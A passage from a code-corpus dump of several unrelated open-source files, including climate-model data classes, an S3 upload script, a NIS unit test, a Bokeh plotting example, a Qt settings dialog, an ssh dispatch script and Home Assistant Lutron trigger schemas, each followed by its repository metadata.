variable name to be processed
Returns
-------
returns filename of file with multi-ensemble means
"""
# use model parser to generate a list of available institutes and
# models from data directory
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
CMP = preprocessor.CMIP5ModelParser(self.data_dir)
model_list = CMP.get_all_models()
# model name in configuration file is assumed to be INSTITUTE:MODEL
institute = self.model.split(':')[0]
model = self.model.split(':')[1]
# TODO why is the institute not in the model output name ???
output_file = get_temporary_directory() + the_variable + '_' + mip + '_' + model + '_' + self.experiment + '_ensmean.nc'
if institute not in model_list.keys():
raise ValueError('Data for this institute is not existing: %s' % institute)
# do preprocessing of data from multiple ensembles if file
# already existing, then no processing is done
C5PP = preprocessor.CMIP5Preprocessor(data_dir, output_file,
the_variable, model,
self.experiment,
institute=institute, mip=mip, realm=realm)
# calculate the ensemble mean and store as file
# also the STDV is calculated on the fly calculated
# resulting filenames are available by C5PP.outfile_ensmean and C5PP.outfile_ensstd
C5PP.ensemble_mean(delete=False,
start_time=self.start_time,
stop_time=self.stop_time)
return C5PP.outfile_ensmean
class CMIP5RAW_SINGLE(CMIP5RAWData):
"""
This class is supposed to use CMIP5 data in RAW format.
It is supposed to handle single emsemble members
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
model_type : str
model type like specified in the configuration file. It is
supossed to be of format MPI-M:MPI-ESM-LR#1 etc.
where after # there needs to be an integer number specifying
the emsemble member number
"""
if name == '':
name = model
# split between model type and ensemble member
s = model.split('#')
if len(s) != 2:
print model, s
raise ValueError('ERROR: invalid ensemble member specification')
else:
model = s[0]
self.ens_member = int(s[1])
self.institute = model.split(':')[0]
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAWSINGLE'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, variable, **kwargs):
"""
return RAW filename for class CMIP5RAWSINGLE
"""
# information comes from model_data_routines.json
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
temporal_resolution = kwargs[self.type].pop('temporal_resolution')
assert temporal_resolution is not None, 'ERROR: <temporal_resolution> needs to be provided (CMIP5RAWSINGLE)'
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
model = self.model.split(':')[1]
fp = data_dir + self.institute + os.sep + model + os.sep + self.experiment + os.sep + temporal_resolution + os.sep + realm + os.sep + mip + os.sep + 'r' + str(self.ens_member) + 'i1p1' + os.sep + variable + os.sep + variable + '_' + mip + '_' + model + '_' + self.experiment + '_r' + str(self.ens_member) + 'i1p1_*.nc'
files = glob.glob(fp)
if len(files) == 0:
return None
if len(files) != 1:
print files
raise ValueError('More than one file found!')
return files[0]
class CMIP3Data(CMIP5Data):
"""
Class for CMIP3 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir: directory that specifies the root directory where the data is located
model: TBD tood
experiment: specifies the ID of the experiment (str)
dic_variables:
name: TBD todo
shift_lon: specifies if longitudes of data need to be shifted
kwargs: other keyword arguments
"""
super(CMIP3Data, self).__init__(data_dir, model, experiment, dic_variables, name=model, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP3'
self._unique_name = self._get_unique_name()
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505 | 0.003755 |
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-5, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import os
import sys
import boto
from boto.s3.key import Key
# This script assumes the following environment variables are set for boto:
# - AWS_ACCESS_KEY_ID
# - AWS_SECRET_ACCESS_KEY
REGION = "us-west-2"
BUCKET = "artifacts.numenta.org"
RELEASE_FOLDER = "numenta/nupic.core/releases/nupic.bindings"
def upload(artifactsBucket, wheelFileName, wheelPath):
key = Key(artifactsBucket)
key.key = "%s/%s" % (RELEASE_FOLDER, wheelFileName)
print "Uploading %s to %s/%s..." % (wheelFileName, BUCKET, RELEASE_FOLDER)
key.set_contents_from_filename(wheelPath)
def run(wheelPath):
wheelFileName = os.path.basename(wheelPath)
conn = boto.connect_s3()
artifactsBucket = conn.get_bucket(BUCKET)
upload(artifactsBucket, wheelFileName, wheelPath)
if __name__ == "__main__":
wheelPath = sys.argv[1]
run(wheelPath)
|
metaml/nupic.core
|
ci/travis/deploy-wheel-to-s3.py
|
Python
|
agpl-3.0
| 1,831 | 0.0071 |
from test import test_support
import unittest
nis = test_support.import_module('nis')
class NisTests(unittest.TestCase):
def test_maps(self):
try:
maps = nis.maps()
except nis.error, msg:
# NIS is probably not active, so this test isn't useful
self.skipTest(str(msg))
try:
# On some systems, this map is only accessible to the
# super user
maps.remove("passwd.adjunct.byname")
except ValueError:
pass
done = 0
for nismap in maps:
mapping = nis.cat(nismap)
for k, v in mapping.items():
if not k:
continue
if nis.match(k, nismap) != v:
self.fail("NIS match failed for key `%s' in map `%s'" % (k, nismap))
else:
# just test the one key, otherwise this test could take a
# very long time
done = 1
break
if done:
break
def test_main():
test_support.run_unittest(NisTests)
if __name__ == '__main__':
test_main()
|
j5shi/Thruster
|
pylibs/test/test_nis.py
|
Python
|
gpl-2.0
| 1,215 | 0.003292 |
from __future__ import print_function
import numpy as np
import pandas as pd
from bokeh.browserlib import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.glyphs import Circle, Line
from bokeh.objects import (
ColumnDataSource, Glyph, Grid, GridPlot, LinearAxis, Plot, Range1d
)
from bokeh.resources import INLINE
raw_columns=[
[10.0, 8.04, 10.0, 9.14, 10.0, 7.46, 8.0, 6.58],
[8.0, 6.95, 8.0, 8.14, 8.0, 6.77, 8.0, 5.76],
[13.0, 7.58, 13.0, 8.74, 13.0, 12.74, 8.0, 7.71],
[9.0, 8.81, 9.0, 8.77, 9.0, 7.11, 8.0, 8.84],
[11.0, 8.33, 11.0, 9.26, 11.0, 7.81, 8.0, 8.47],
[14.0, 9.96, 14.0, 8.10, 14.0, 8.84, 8.0, 7.04],
[6.0, 7.24, 6.0, 6.13, 6.0, 6.08, 8.0, 5.25],
[4.0, 4.26, 4.0, 3.10, 4.0, 5.39, 19.0, 12.5],
[12.0, 10.84, 12.0, 9.13, 12.0, 8.15, 8.0, 5.56],
[7.0, 4.82, 7.0, 7.26, 7.0, 6.42, 8.0, 7.91],
[5.0, 5.68, 5.0, 4.74, 5.0, 5.73, 8.0, 6.89]]
quartet = pd.DataFrame(data=raw_columns, columns=
['Ix','Iy','IIx','IIy','IIIx','IIIy','IVx','IVy'])
circles_source = ColumnDataSource(
data = dict(
xi = quartet['Ix'],
yi = quartet['Iy'],
xii = quartet['IIx'],
yii = quartet['IIy'],
xiii = quartet['IIIx'],
yiii = quartet['IIIy'],
xiv = quartet['IVx'],
yiv = quartet['IVy'],
)
)
x = np.linspace(-0.5, 20.5, 10)
y = 3 + 0.5 * x
lines_source = ColumnDataSource(data=dict(x=x, y=y))
xdr = Range1d(start=-0.5, end=20.5)
ydr = Range1d(start=-0.5, end=20.5)
def make_plot(title, xname, yname):
plot = Plot(
x_range=xdr, y_range=ydr, data_sources=[lines_source, circles_source],
title=title, plot_width=400, plot_height=400, border_fill='white', background_fill='#e9e0db')
xaxis = LinearAxis(plot=plot, dimension=0, location="bottom", axis_line_color=None)
yaxis = LinearAxis(plot=plot, dimension=1, location="left", axis_line_color=None)
xgrid = Grid(plot=plot, dimension=0, axis=xaxis)
ygrid = Grid(plot=plot, dimension=1, axis=yaxis)
line_renderer = Glyph(
data_source = lines_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Line(x='x', y='y', line_color="#666699", line_width=2),
)
plot.renderers.append(line_renderer)
circle_renderer = Glyph(
data_source = circles_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Circle(x=xname, y=yname, size=12, fill_color="#cc6633",
line_color="#cc6633", fill_alpha=0.5),
)
plot.renderers.append(circle_renderer)
return plot
#where will this comment show up
I = make_plot('I', 'xi', 'yi')
II = make_plot('II', 'xii', 'yii')
III = make_plot('III', 'xiii', 'yiii')
IV = make_plot('IV', 'xiv', 'yiv')
grid = GridPlot(children=[[I, II], [III, IV]], plot_width=800)
doc = Document( )
doc.add(grid)
if __name__ == "__main__":
filename = "anscombe.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Anscombe's Quartet"))
print("Wrote %s" % filename)
view(filename)
|
the13fools/Bokeh_Examples
|
glyphs/anscombe.py
|
Python
|
bsd-3-clause
| 3,251 | 0.021839 |
#
# Base object of all payload sources.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from abc import ABCMeta
from dasbus.server.interface import dbus_interface
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.base.base_template import ModuleInterfaceTemplate
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_SOURCE
@dbus_interface(PAYLOAD_SOURCE.interface_name)
class PayloadSourceBaseInterface(ModuleInterfaceTemplate, metaclass=ABCMeta):
"""Base class for all the payload source module interfaces.
This object contains API shared by all the sources. Everything in this object has
to be implemented by a source to be used.
"""
@property
def Type(self) -> Str:
"""Get the type of this source.
Possible values are:
- LIVE_OS_IMAGE
"""
return self.implementation.type.value
|
atodorov/anaconda
|
pyanaconda/modules/payloads/source/source_base_interface.py
|
Python
|
gpl-2.0
| 1,817 | 0.001101 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Common/Shared code related to the Settings dialog
# Copyright (C) 2010-2018 Filipe Coelho <falktx@falktx.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# ------------------------------------------------------------------------------------------------------------
# Imports (Global)
if True:
from PyQt5.QtCore import pyqtSlot, QSettings
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
else:
from PyQt4.QtCore import pyqtSlot, QSettings
from PyQt4.QtGui import QDialog, QDialogButtonBox
# ------------------------------------------------------------------------------------------------------------
# Imports (Custom Stuff)
import ui_settings_app
from shared import *
from patchcanvas_theme import *
# ------------------------------------------------------------------------------------------------------------
# Global variables
# Tab indexes
TAB_INDEX_MAIN = 0
TAB_INDEX_CANVAS = 1
TAB_INDEX_LADISH = 2
TAB_INDEX_NONE = 3
# PatchCanvas defines
CANVAS_ANTIALIASING_SMALL = 1
CANVAS_EYECANDY_SMALL = 1
# LADISH defines
LADISH_CONF_KEY_DAEMON_NOTIFY = "/org/ladish/daemon/notify"
LADISH_CONF_KEY_DAEMON_SHELL = "/org/ladish/daemon/shell"
LADISH_CONF_KEY_DAEMON_TERMINAL = "/org/ladish/daemon/terminal"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART = "/org/ladish/daemon/studio_autostart"
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY = "/org/ladish/daemon/js_save_delay"
# LADISH defaults
LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT = True
LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT = "sh"
LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT = "x-terminal-emulator"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT = True
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT = 0
# Internal defaults
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = HOME
# ------------------------------------------------------------------------------------------------------------
# Change internal defaults
def setDefaultProjectFolder(folder):
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = folder
# ------------------------------------------------------------------------------------------------------------
# Settings Dialog
class SettingsW(QDialog):
def __init__(self, parent, appName, hasOpenGL=False):
QDialog.__init__(self, parent)
self.ui = ui_settings_app.Ui_SettingsW()
self.ui.setupUi(self)
# -------------------------------------------------------------
# Set default settings
self.fRefreshInterval = 120
self.fAutoHideGroups = True
self.fUseSystemTray = True
self.fCloseToTray = False
# -------------------------------------------------------------
# Set app-specific settings
if appName == "catarina":
self.fAutoHideGroups = False
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_CANVAS, 0)
elif appName == "catia":
self.fUseSystemTray = False
self.ui.group_main_paths.setEnabled(False)
self.ui.group_main_paths.setVisible(False)
self.ui.group_tray.setEnabled(False)
self.ui.group_tray.setVisible(False)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
elif appName == "claudia":
self.ui.cb_jack_port_alias.setEnabled(False)
self.ui.cb_jack_port_alias.setVisible(False)
self.ui.label_jack_port_alias.setEnabled(False)
self.ui.label_jack_port_alias.setVisible(False)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
else:
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_CANVAS)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.stackedWidget.setCurrentIndex(TAB_INDEX_NONE)
return
# -------------------------------------------------------------
# Load settings
self.loadSettings()
# -------------------------------------------------------------
# Set-up GUI
if not hasOpenGL:
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_use_opengl.setEnabled(False)
self.ui.lw_page.item(0, 0).setIcon(getIcon(appName, 48))
self.ui.label_icon_main.setPixmap(getIcon(appName, 48).pixmap(48, 48))
# -------------------------------------------------------------
# Set-up connections
self.accepted.connect(self.slot_saveSettings)
self.ui.buttonBox.button(QDialogButtonBox.Reset).clicked.connect(self.slot_resetSettings)
self.ui.b_main_def_folder_open.clicked.connect(self.slot_getAndSetProjectPath)
def loadSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
self.ui.le_main_def_folder.setText(settings.value("Main/DefaultProjectFolder", SETTINGS_DEFAULT_PROJECT_FOLDER, type=str))
self.ui.cb_tray_enable.setChecked(settings.value("Main/UseSystemTray", self.fUseSystemTray, type=bool))
self.ui.cb_tray_close_to.setChecked(settings.value("Main/CloseToTray", self.fCloseToTray, type=bool))
self.ui.sb_gui_refresh.setValue(settings.value("Main/RefreshInterval", self.fRefreshInterval, type=int))
self.ui.cb_jack_port_alias.setCurrentIndex(settings.value("Main/JackPortAlias", 2, type=int))
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
self.ui.cb_canvas_hide_groups.setChecked(settings.value("Canvas/AutoHideGroups", self.fAutoHideGroups, type=bool))
self.ui.cb_canvas_bezier_lines.setChecked(settings.value("Canvas/UseBezierLines", True, type=bool))
self.ui.cb_canvas_eyecandy.setCheckState(settings.value("Canvas/EyeCandy", CANVAS_EYECANDY_SMALL, type=int))
self.ui.cb_canvas_use_opengl.setChecked(settings.value("Canvas/UseOpenGL", False, type=bool))
self.ui.cb_canvas_render_aa.setCheckState(settings.value("Canvas/Antialiasing", CANVAS_ANTIALIASING_SMALL, type=int))
self.ui.cb_canvas_render_hq_aa.setChecked(settings.value("Canvas/HighQualityAntialiasing", False, type=bool))
themeName = settings.value("Canvas/Theme", getDefaultThemeName(), type=str)
for i in range(Theme.THEME_MAX):
thisThemeName = getThemeName(i)
self.ui.cb_canvas_theme.addItem(thisThemeName)
if thisThemeName == themeName:
self.ui.cb_canvas_theme.setCurrentIndex(i)
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
self.ui.cb_ladish_notify.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_NOTIFY, LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT, type=bool))
self.ui.le_ladish_shell.setText(settings.value(LADISH_CONF_KEY_DAEMON_SHELL, LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT, type=str))
self.ui.le_ladish_terminal.setText(settings.value(LADISH_CONF_KEY_DAEMON_TERMINAL, LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT, type=str))
self.ui.cb_ladish_studio_autostart.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT, type=bool))
self.ui.sb_ladish_jsdelay.setValue(settings.value(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT, type=int))
@pyqtSlot()
def slot_saveSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
settings.setValue("Main/RefreshInterval", self.ui.sb_gui_refresh.value())
if self.ui.group_tray.isEnabled():
settings.setValue("Main/UseSystemTray", self.ui.cb_tray_enable.isChecked())
settings.setValue("Main/CloseToTray", self.ui.cb_tray_close_to.isChecked())
if self.ui.group_main_paths.isEnabled():
settings.setValue("Main/DefaultProjectFolder", self.ui.le_main_def_folder.text())
if self.ui.cb_jack_port_alias.isEnabled():
settings.setValue("Main/JackPortAlias", self.ui.cb_jack_port_alias.currentIndex())
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
settings.setValue("Canvas/Theme", self.ui.cb_canvas_theme.currentText())
settings.setValue("Canvas/AutoHideGroups", self.ui.cb_canvas_hide_groups.isChecked())
settings.setValue("Canvas/UseBezierLines", self.ui.cb_canvas_bezier_lines.isChecked())
settings.setValue("Canvas/UseOpenGL", self.ui.cb_canvas_use_opengl.isChecked())
settings.setValue("Canvas/HighQualityAntialiasing", self.ui.cb_canvas_render_hq_aa.isChecked())
# 0, 1, 2 match their enum variants
settings.setValue("Canvas/EyeCandy", self.ui.cb_canvas_eyecandy.checkState())
settings.setValue("Canvas/Antialiasing", self.ui.cb_canvas_render_aa.checkState())
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
settings.setValue(LADISH_CONF_KEY_DAEMON_NOTIFY, self.ui.cb_ladish_notify.isChecked())
settings.setValue(LADISH_CONF_KEY_DAEMON_SHELL, self.ui.le_ladish_shell.text())
settings.setValue(LADISH_CONF_KEY_DAEMON_TERMINAL, self.ui.le_ladish_terminal.text())
settings.setValue(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, self.ui.cb_ladish_studio_autostart.isChecked())
settings.setValue(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, self.ui.sb_ladish_jsdelay.value())
@pyqtSlot()
def slot_resetSettings(self):
if self.ui.lw_page.currentRow() == TAB_INDEX_MAIN:
self.ui.le_main_def_folder.setText(SETTINGS_DEFAULT_PROJECT_FOLDER)
self.ui.cb_tray_enable.setChecked(self.fUseSystemTray)
self.ui.cb_tray_close_to.setChecked(self.fCloseToTray)
self.ui.sb_gui_refresh.setValue(self.fRefreshInterval)
self.ui.cb_jack_port_alias.setCurrentIndex(2)
elif self.ui.lw_page.currentRow() == TAB_INDEX_CANVAS:
self.ui.cb_canvas_theme.setCurrentIndex(0)
self.ui.cb_canvas_hide_groups.setChecked(self.fAutoHideGroups)
self.ui.cb_canvas_bezier_lines.setChecked(True)
self.ui.cb_canvas_eyecandy.setCheckState(Qt.PartiallyChecked)
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_render_aa.setCheckState(Qt.PartiallyChecked)
self.ui.cb_canvas_render_hq_aa.setChecked(False)
elif self.ui.lw_page.currentRow() == TAB_INDEX_LADISH:
self.ui.cb_ladish_notify.setChecked(LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT)
self.ui.cb_ladish_studio_autostart.setChecked(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT)
self.ui.le_ladish_shell.setText(LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT)
self.ui.le_ladish_terminal.setText(LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT)
@pyqtSlot()
def slot_getAndSetProjectPath(self):
getAndSetPath(self, self.ui.le_main_def_folder.text(), self.ui.le_main_def_folder)
def done(self, r):
QDialog.done(self, r)
self.close()
|
falkTX/Cadence
|
src/shared_settings.py
|
Python
|
gpl-2.0
| 12,056 | 0.004728 |
#!/usr/bin/env python
import subprocess
"""
A ssh based command dispatch system
"""
machines = ["10.0.1.40",
"10.0.1.50",
"10.0.1.51",
"10.0.1.60",
"10.0.1.80"]
cmd = "python /src/fingerprint.py"
for machine in machines:
subprocess.call("ssh root@%s %s" % (machine, cmd), shell=True)
|
lluxury/P_U_S_A
|
8_OS_Soup/code/dispatch1.py
|
Python
|
mit
| 297 | 0.016835 |
#!/usr/bin/env python3
# Update plural forms expressions from the data collected by Unicode Consortium
# (see http://www.unicode.org/cldr/charts/supplemental/language_plural_rules.html),
# but from a JSON version by Transifex folks
import os.path
import sys
import urllib.request
import re
import gettext
import json
import subprocess
from tempfile import TemporaryDirectory
import xml.etree.ElementTree as ET
PRISM_COMPONENTS_URL = 'https://github.com/PrismJS/prism/raw/master/components.json'
LANGUAGE_MAP_URL = 'https://github.com/blakeembrey/language-map/raw/master/languages.json'
# resolve ambiguities:
OVERRIDES = {
'h' : 'cpp',
'inc' : 'php',
'cake' : 'coffeescript',
'es' : 'javascript',
'fcgi' : 'lua',
'cgi' : 'perl',
'pl' : 'perl',
'pro' : 'perl',
'ts' : 'typescript',
'tsx' : 'typescript',
'sch' : 'scheme',
'cs' : 'csharp',
'st' : 'smalltalk',
}
# known irrelevant languages:
BLACKLIST = set([
'glsl', 'nginx', 'apacheconf', 'matlab', 'opencl', 'puppet', 'reason', 'renpy',
'plsql', 'sql', 'tex',
])
# ...and extensions:
BLACKLIST_EXT = set([
'spec', 'pluginspec', 'ml',
])
MARKER_BEGIN = "// Code generated with scripts/extract-fileviewer-mappings.py begins here"
MARKER_END = "// Code generated with scripts/extract-fileviewer-mappings.py ends here"
prism_langs = json.loads(urllib.request.urlopen(PRISM_COMPONENTS_URL).read().decode('utf-8'))['languages']
del prism_langs['meta']
language_map = json.loads(urllib.request.urlopen(LANGUAGE_MAP_URL).read().decode('utf-8'))
prism_known = {}
for lang, data in prism_langs.items():
prism_known[lang] = lang
for a in data.get('alias', []):
prism_known[a] = lang
ext_to_lang = {}
for lang, data in language_map.items():
lang = lang.lower()
lango = lang
if not lang in prism_known:
for a in data.get('aliases', []):
if a in prism_known:
lang = a
break
if lang not in prism_known:
continue
if lang in BLACKLIST:
continue
for ext in data.get('extensions', []):
assert ext[0] == '.'
ext = ext[1:].lower()
if ext in BLACKLIST_EXT:
continue
if ext != lang:
if ext in ext_to_lang:
if ext in OVERRIDES:
ext_to_lang[ext] = OVERRIDES[ext]
else:
sys.stderr.write(f'SKIPPING due to extension conflict: {ext} both {lang} and {ext_to_lang[ext]}\n')
ext_to_lang[ext] = lang
else:
ext_to_lang[ext] = lang
output = f'{MARKER_BEGIN}\n\n'
for ext in sorted(ext_to_lang.keys()):
lang = ext_to_lang[ext]
output += f'{{ "{ext}", "{lang}" }},\n'
output += f'\n{MARKER_END}\n'
if os.path.isfile("src/fileviewer.extensions.h"):
outfname = "src/fileviewer.extensions.h"
else:
raise RuntimeError("run this script from project root directory")
with open(outfname, "rt") as f:
orig_content = f.read()
content = re.sub('%s(.*?)%s' % (MARKER_BEGIN, MARKER_END),
output,
orig_content,
0,
re.DOTALL)
with open(outfname, "wt") as f:
f.write(content)
print(output)
sys.stderr.write(f'Generated code written to {outfname}\n')
|
vslavik/poedit
|
scripts/extract-fileviewer-mappings.py
|
Python
|
mit
| 3,349 | 0.008361 |
"""Provides device triggers for lutron caseta."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.components.automation import (
AutomationActionType,
AutomationTriggerInfo,
)
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.components.homeassistant.triggers import event as event_trigger
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_EVENT,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from homeassistant.helpers.typing import ConfigType
from .const import (
ACTION_PRESS,
ACTION_RELEASE,
ATTR_ACTION,
ATTR_BUTTON_NUMBER,
ATTR_SERIAL,
BUTTON_DEVICES,
CONF_SUBTYPE,
DOMAIN,
LUTRON_CASETA_BUTTON_EVENT,
)
SUPPORTED_INPUTS_EVENTS_TYPES = [ACTION_PRESS, ACTION_RELEASE]
LUTRON_BUTTON_TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_TYPE): vol.In(SUPPORTED_INPUTS_EVENTS_TYPES),
}
)
PICO_2_BUTTON_BUTTON_TYPES = {
"on": 2,
"off": 4,
}
PICO_2_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_BUTTON_TYPES),
}
)
PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_3_BUTTON_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
}
PICO_3_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_BUTTON_TYPES),
}
)
PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_4_BUTTON_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"button_4": 11,
}
PICO_4_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_BUTTON_TYPES),
}
)
PICO_4_BUTTON_ZONE_BUTTON_TYPES = {
"on": 8,
"raise": 9,
"lower": 10,
"off": 11,
}
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_ZONE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_SCENE_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"off": 11,
}
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_SCENE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_2_GROUP_BUTTON_TYPES = {
"group_1_button_1": 8,
"group_1_button_2": 9,
"group_2_button_1": 10,
"group_2_button_2": 11,
}
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_2_GROUP_BUTTON_TYPES),
}
)
FOUR_GROUP_REMOTE_BUTTON_TYPES = {
"open_all": 2,
"stop_all": 3,
"close_all": 4,
"raise_all": 5,
"lower_all": 6,
"open_1": 10,
"stop_1": 11,
"close_1": 12,
"raise_1": 13,
"lower_1": 14,
"open_2": 18,
